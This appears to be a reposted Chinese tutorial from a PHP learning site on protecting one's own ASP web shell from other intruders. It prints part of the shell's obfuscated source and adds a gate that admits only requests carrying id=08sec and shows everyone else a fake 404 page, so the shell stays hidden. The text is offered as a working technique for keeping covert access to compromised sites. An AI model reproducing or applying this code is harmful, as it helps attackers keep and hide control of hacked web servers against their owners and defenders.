来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处...
我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了
或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。
如何加上密码让他人进不来呢? 有些人直接加个登陆界面,人家一看就知道这是大马,还可以猜密码,我的方法就与众不同 首先我们来看看他的一部分源码 <% 'pue=true On Error Resume Next server.scripttimeout=600 UserPass="login" response.buffer = true Response.Expires = -1 Session.Timeout=60 Const wwj="NET WORK SYSTEM" Const jlt="WEB TESTER'S SYSTEM" Const oqk="zxp|cyk|dez|bki|ooc|che|koc|zbk|cxa|slf|ysi|azp|bdv|tempfile|zlc|miv|gez|kmt|sqdb|kbsl|newf" Const pnf=true Const rfd=33 Const yqo="dsmfk" Const kuf="GB2312" Const gco="_" Const fgb="want_pre.asp" Const righthz="_request_send_sumbit_include_reel_open_form_month_data" public br,pbwell,juppath,foldermax,maxpath foldermax=0 dim login,gem,jdu,kyj,ttg,cl,ghq,cey,zxp,cqo,iax,udo,cyk,dez,bki,jqj,tio,jki,nyr,glm,xnr,vnm,pue,zoi,ulz,jsr,gtu,qdr,yqc,ooc,bvn,khd,che,koc,zbk,cxa,slf,ysi,irs,sxi,bin,azp,bdv,wld,ovy,nqv,T1,ito,dqc,eaz,bia,uyy,yjd,xur,nld,zlc,miv,gez,kmt,ouc,rxg,amm,xbd,vuj,dov,ysv,mt,znk,boo,opy,moi,ddo,okCPU,iak,clw,bpx,akh,cgh,ouo,etz,uvt,alr,zpq,pfv,tlk,nrp,zni,ypd,nww,rrt,boq,lqo,gsh,eyq,ifp,afc,pgh,cen,lsv,tag,zhx,eza,ydo,tfv,uxo,fbp,mct,znz jki= Clng("&H0") for i=0 to 12 cqo=cqo&"#"&right("000000"&trim(hex(jki)),6)&"," jki=jki+1118481 next colors=cqo&"#FFFFFF,#f44444,#00FF00,#f00000" cl=split(colors,",") 怎样进行处理呢? 我在前面加上了
<% if request("id")="08sec" then session("ISUSER00")= "TRUE" end if %> <% If Session("ISUSER00") = "" Then response.write("<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>") Response.End end if %> 这段代码的意思是 如果返回的id是08sec的话就添加一个session isuser00的值为true 如果Session("ISUSER00")的值为空显示HTTP/1.1 404 Not Found 如果不是就执行下面的代码 所以我们的大马就被保护起来了 效果如下: |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com